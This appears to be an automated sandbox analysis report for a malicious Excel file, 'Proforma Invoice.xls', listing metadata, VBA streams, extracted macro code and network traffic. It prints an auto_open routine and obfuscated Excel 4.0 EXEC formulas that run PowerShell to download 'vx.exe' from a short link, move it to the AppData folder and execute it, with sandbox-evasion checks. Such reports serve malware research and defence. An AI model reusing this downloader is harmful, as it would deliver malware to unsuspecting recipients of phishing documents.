                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                                Static File Info

                                                General

                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dexter MORGAN, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Oct 25 18:24:14 2020, Last Saved Time/Date: Sat Nov 14 12:53:19 2020, Security: 1
                                                Entropy (8bit):6.722113426938609
                                                TrID:
                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                File name:Proforma Invoice.xls
                                                File size:76288
                                                MD5:55db711144ff4a35faf58d982e7cf727
                                                SHA1:ea7b59dde9f0600915069dec66f8410f25cb66fd
                                                SHA256:6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
                                                SHA512:92e99e23ef71f4b1b9e3f6733ca16d51a2e44a777581c6a4a9b35b4c3574620cbff37ba02052bd7932f75acd2b70a2750f4c53c0d87db75e8a10c4aa1cf4192a
                                                SSDEEP:1536:/pqnSGiysRchNXHfA1MiWhZFGkElMFAAr7IQmSb4wIE7zp0RhBv1hQz7rTb16mL:/4nSGiysRchNXHfA1MiWhZFGkElMFAAv
                                                File Content Preview:........................;...................................z..................................................................................................................................................................................................

                                                File Icon

                                                Icon Hash:e4eea286a4b4bcb4

                                                Static OLE Info

                                                General

                                                Document Type:OLE
                                                Number of OLE Files:1

                                                OLE File "Proforma Invoice.xls"

                                                Indicators

                                                Has Summary Info:True
                                                Application Name:Microsoft Excel
                                                Encrypted Document:False
                                                Contains Word Document Stream:False
                                                Contains Workbook/Book Stream:True
                                                Contains PowerPoint Document Stream:False
                                                Contains Visio Document Stream:False
                                                Contains ObjectPool Stream:
                                                Flash Objects Count:
                                                Contains VBA Macros:True

                                                Summary

                                                Code Page:1252
                                                Author:Dexter MORGAN
                                                Last Saved By:Administrator
                                                Create Time:2020-10-25 18:24:14
                                                Last Saved Time:2020-11-14 12:53:19
                                                Creating Application:Microsoft Excel
                                                Security:1

                                                Document Summary

                                                Document Code Page:1252
                                                Thumbnail Scaling Desired:False
                                                Company:
                                                Contains Dirty Links:False
                                                Shared Document:False
                                                Changed Hyperlinks:False
                                                Application Version:983040

                                                Streams with VBA

                                                VBA File Name: Feuil1.cls, Stream Size: 977
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/Feuil1
                                                VBA File Name:Feuil1.cls
                                                Stream Size:977
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P , S . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 50 2c 53 9f 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                VB_Exposed
                                                Attribute
                                                VB_Name
                                                VB_Creatable
                                                VB_PredeclaredId
                                                VB_GlobalNameSpace
                                                VB_Base
                                                VB_Customizable
                                                False
                                                VB_TemplateDerived
                                                VBA Code
                                                Attribute VB_Name = "Feuil1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
                                                VBA File Name: Module1.bas, Stream Size: 1512
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                                VBA File Name:Module1.bas
                                                Stream Size:1512
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . P , : u . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 01 00 03 f0 00 00 00 dc 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 0a 03 00 00 42 05 00 00 00 00 00 00 01 00 00 00 50 2c 3a 75 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                (strMacro)
                                                strMacro
                                                Attribute
                                                auto_open()
                                                VB_Name
                                                String
                                                VBA Code
                                                Attribute VB_Name = "Module1"
Sub auto_open()


Dim strMacro As String




Sheets(1).Range("E580").Name = "Auto_ouvrir51"


strMacro = "Auto_ouvrir51"
Run (strMacro)



End Sub
                                                VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                VBA File Name:ThisWorkbook.cls
                                                Stream Size:985
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P , . + . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 50 2c c8 2b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                False
                                                VB_Exposed
                                                Attribute
                                                VB_Name
                                                VB_Creatable
                                                "ThisWorkbook"
                                                VB_PredeclaredId
                                                VB_GlobalNameSpace
                                                VB_Base
                                                VB_Customizable
                                                VB_TemplateDerived
                                                VBA Code
                                                Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                Streams

                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                General
                                                Stream Path:\x1CompObj
                                                File Type:data
                                                Stream Size:115
                                                Entropy:4.26356656053
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . F e u i l l e d e c a l c u l M i c r o s o f t E x c e l . 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 27 00 00 00 46 65 75 69 6c 6c 65 20 64 65 20 63 61 6c 63 75 6c 20 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c a0 32 30 30 33 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 296
                                                General
                                                Stream Path:\x5DocumentSummaryInformation
                                                File Type:data
                                                Stream Size:296
                                                Entropy:3.12351939639
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f8 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ac 00 00 00
                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 224
                                                General
                                                Stream Path:\x5SummaryInformation
                                                File Type:data
                                                Stream Size:224
                                                Entropy:3.82752718687
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D e x t e r M O R G A N . . . . . . . . . . . A d m i n i s t r a t o r . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . . . . . @ . . . . . W . . . . . . . . . . . .
                                                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 b0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 60 00 00 00 12 00 00 00 78 00 00 00 0c 00 00 00 90 00 00 00 0d 00 00 00 9c 00 00 00 13 00 00 00 a8 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0e 00 00 00
                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 61163
                                                General
                                                Stream Path:Workbook
                                                File Type:Applesoft BASIC program data, first line number 16
                                                Stream Size:61163
                                                Entropy:7.20561555755
                                                Base64 Encoded:True
                                                Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . U s e r n i s t r a t o r B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . B T . . 8 . . . . . . . X
                                                Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 55 73 65 72 6e 69 73 74 72 61 74 6f 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 533
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                File Type:ASCII text, with CRLF line terminators
                                                Stream Size:533
                                                Entropy:5.2193098334
                                                Base64 Encoded:True
                                                Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F e u i l 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D E D C 7 2 1 D 9 2 2 7 2 3 2 B 2 3 2 B 2 7 2 F 2 7 2 F " . . D P B = " 7 3 7 1 D F 8 8
                                                Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 65 75 69 6c 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 48 65 6c 70 46
                                                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 86
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                File Type:data
                                                Stream Size:86
                                                Entropy:3.21559847503
                                                Base64 Encoded:False
                                                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . F e u i l 1 . F . e . u . i . l . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
                                                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 46 65 75 69 6c 31 00 46 00 65 00 75 00 69 00 6c 00 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2607
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                File Type:data
                                                Stream Size:2607
                                                Entropy:4.00233365281
                                                Base64 Encoded:False
                                                Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . . ( . x . 8 . 6 . ) . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . .
                                                Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 2c 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 1136
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_0
                                                File Type:data
                                                Stream Size:1136
                                                Entropy:4.08521227715
                                                Base64 Encoded:False
                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . 2 . . . K . ` . A e ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:93 4b 2a a3 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 02 00 00 00 00 00 01 00 02 00 02 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 02 00 00 7e 6f 00 00 7f 00 00 00 00 15 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 74
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_1
                                                File Type:data
                                                Stream Size:74
                                                Entropy:1.7969826379
                                                Base64 Encoded:False
                                                Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . .
                                                Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff 09 00 00 00 00 00 03 00 74 00 00 7f 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 84
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_2
                                                File Type:data
                                                Stream Size:84
                                                Entropy:1.91120509258
                                                Base64 Encoded:False
                                                Data ASCII:r U . . . . . . . . . . . . . . . . . . . ~ | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . k . . . . . . .
                                                Data Raw:72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 02 00 00 7e 7c 00 00 7f 00 00 00 00 0e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 08 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ff ff ff ff 04 00 00 12 00 00 6b 00 00 7f 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 103
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/__SRP_3
                                                File Type:data
                                                Stream Size:103
                                                Entropy:1.89141813866
                                                Base64 Encoded:False
                                                Data ASCII:r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n . . . . . . .
                                                Data Raw:72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 08 00 00 00 04 00 24 00 81 00 00 00 00 00 02 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6e 00 00 7f 00 00 00 00
                                                Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 568
                                                General
                                                Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                File Type:data
                                                Stream Size:568
                                                Entropy:6.35089764744
                                                Base64 Encoded:True
                                                Data ASCII:. 4 . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                Data Raw:01 34 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 e8 8b 95 61 06 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                Macro 4.0 Code

                                                "=ERROR(FALSE; (B100))""=IF(GET.WORKSPACE(19);;CLOSE(TRUE))""=IF(GET.WORKSPACE(42);;CLOSE(TRUE))""=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').""""Invoke""""('""&CHAR(104)&""ttps://cutt.ly/ZhqUH1O','vx.exe')"")""=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 stARt`-slE`Ep 20; Move-Item """"vx.exe"""" -Destination """"${enV`:appdata}"""""")""=EXEC(CHAR(99)&CHAR(109)&CHAR(100)&CHAR(32)&CHAR(47)&CHAR(99)&CHAR(32)&CHAR(112)&CHAR(111)&""wer^she""&CHAR(108)&CHAR(108)&CHAR(32)&"" -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe"")"=PAUSE()

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 19, 2020 09:56:41.368407011 CET49165443192.168.2.22104.22.0.232
                                                Nov 19, 2020 09:56:41.393265963 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:41.393454075 CET49165443192.168.2.22104.22.0.232
                                                Nov 19, 2020 09:56:41.404120922 CET49165443192.168.2.22104.22.0.232
                                                Nov 19, 2020 09:56:41.426343918 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:41.431905985 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:41.431948900 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:41.431972027 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:41.432027102 CET49165443192.168.2.22104.22.0.232
                                                Nov 19, 2020 09:56:41.443662882 CET49165443192.168.2.22104.22.0.232
                                                Nov 19, 2020 09:56:41.465800047 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:41.465835094 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:41.683109999 CET49165443192.168.2.22104.22.0.232
                                                Nov 19, 2020 09:56:41.693226099 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:41.693289995 CET49165443192.168.2.22104.22.0.232
                                                Nov 19, 2020 09:56:42.633673906 CET49165443192.168.2.22104.22.0.232
                                                Nov 19, 2020 09:56:42.655935049 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:42.769054890 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:42.769084930 CET44349165104.22.0.232192.168.2.22
                                                Nov 19, 2020 09:56:42.769162893 CET49165443192.168.2.22104.22.0.232
                                                Nov 19, 2020 09:56:43.101838112 CET49167443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:43.415772915 CET44349167202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:43.415868998 CET49167443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:43.416306019 CET49167443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:43.729902029 CET44349167202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:43.729928970 CET44349167202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:43.729939938 CET44349167202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:43.729953051 CET44349167202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:43.730106115 CET49167443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:43.743868113 CET49167443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:43.744518042 CET49168443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:44.057604074 CET44349167202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:44.057631016 CET44349167202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:44.058506966 CET44349168202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:44.058621883 CET49167443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:44.058650970 CET49168443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:44.059086084 CET49168443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:44.373168945 CET44349168202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:44.373213053 CET44349168202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:44.373256922 CET44349168202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:44.373271942 CET44349168202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:44.373400927 CET49168443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:44.375323057 CET49168443192.168.2.22202.92.6.10
                                                Nov 19, 2020 09:56:44.689218998 CET44349168202.92.6.10192.168.2.22
                                                Nov 19, 2020 09:56:44.724005938 CET49165443192.168.2.22104.22.0.232

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 19, 2020 09:56:41.343724012 CET5219753192.168.2.228.8.8.8
                                                Nov 19, 2020 09:56:41.356940985 CET53521978.8.8.8192.168.2.22
                                                Nov 19, 2020 09:56:41.895869970 CET5309953192.168.2.228.8.8.8
                                                Nov 19, 2020 09:56:41.914530039 CET53530998.8.8.8192.168.2.22
                                                Nov 19, 2020 09:56:41.918118954 CET5283853192.168.2.228.8.8.8
                                                Nov 19, 2020 09:56:41.930485964 CET53528388.8.8.8192.168.2.22
                                                Nov 19, 2020 09:56:42.774435997 CET6120053192.168.2.228.8.8.8
                                                Nov 19, 2020 09:56:43.100631952 CET53612008.8.8.8192.168.2.22

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Nov 19, 2020 09:56:41.343724012 CET192.168.2.228.8.8.80xc6ccStandard query (0)cutt.lyA (IP address)IN (0x0001)
                                                Nov 19, 2020 09:56:42.774435997 CET192.168.2.228.8.8.80x1bacStandard query (0)shopphongtinh.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Nov 19, 2020 09:56:41.356940985 CET8.8.8.8192.168.2.220xc6ccNo error (0)cutt.ly104.22.0.232A (IP address)IN (0x0001)
                                                Nov 19, 2020 09:56:41.356940985 CET8.8.8.8192.168.2.220xc6ccNo error (0)cutt.ly172.67.8.238A (IP address)IN (0x0001)
